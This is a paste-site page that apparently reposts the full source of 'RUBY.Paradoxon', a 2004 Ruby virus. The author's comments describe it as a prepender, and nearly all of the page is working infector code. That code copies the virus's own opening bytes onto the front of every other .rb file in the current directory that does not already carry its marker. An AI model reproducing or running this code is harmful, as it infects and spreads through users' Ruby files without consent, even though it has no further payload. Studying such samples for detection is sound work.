Advertisement
FlyFar

Virus.Ruby.Paradoxon - Source Code

Jul 3rd, 2023
1,314
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 1.97 KB | Cybersecurity | 0 0
  1. #  RUBY.Paradoxon
  2. #  by Second Part To Hell
  3. #  www.spth.de.vu
  4. #  spth@priest.com
  5. #  written in november 2004
  6. #  in Austria (as a free world citizen)
  7. #
  8. #  The virus you can see now is, as the name already says, a RUBY file infector.
  9. #  You may ask, what the hell is RUBY? Well, it's a web-based script language from
  10. #  japan, where it is very famous and often used. I've read about that language
  11. #  in a Linux Magazine (with the special Knoppix 3.6-scripting edition CD), and I
  12. #  wanted to try it (write a virus for it). OK, I've downloaded the Installation
  13. #  pack (http://www.geocities.co.jp/SiliconValley-PaloAlto/9251/ruby/main.html) for
  14. #  Ruby 1.8.1.2 and the 'Ruby Language Reference Manual'. Then i've started to learn
  15. #  it, and soon I've understood the main parts of the syntax, some important methods
  16. #  and objects and so on. And as a result of my work, you can find the virus here.
  17. #
  18. #  RUBY.Paradoxon is a prepender-virus, which infects all .rb (Ruby) files in the
  19. #  current directory. It doesn't harm the host in any way nor it has any other payload.
  20. #
  21. #  I'm going to write one advanced Ruby virus and write a tutorial about Ruby-infections
  22. #  soon. I've named my virus Paradoxon, because the existence of such a virus is very
  23. #  strange. I hope you enjoy the little trip into a world, nobody has ever met before :)
  24. #
  25. #
  26. # RUBY.Paradoxon
  27. mycode=File.open(__FILE__).read(630)
  28. cdir = Dir.open(Dir.getwd)
  29.   cdir.each do |a|
  30.     if File.ftype(a)=="file" then
  31.       if a[a.length-3, a.length]==".rb" then
  32.         if a!=File.basename(__FILE__) then
  33.           fcode=""
  34.           fle=open(a)
  35.           spth=fle.read(1)
  36.           while spth!=nil
  37.             fcode+=spth
  38.             spth=fle.read(1)
  39.           end
  40.           fle.close
  41.           if fcode[7,9]!="Paradoxon" then
  42.             fcode=mycode+13.chr+10.chr+fcode
  43.             fle=open(a,"w")
  44.               fle.print fcode
  45.             fle.close
  46.           end
  47.         end
  48.       end
  49.     end
  50.   end
  51. cdir.close
Tags: SPTH
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement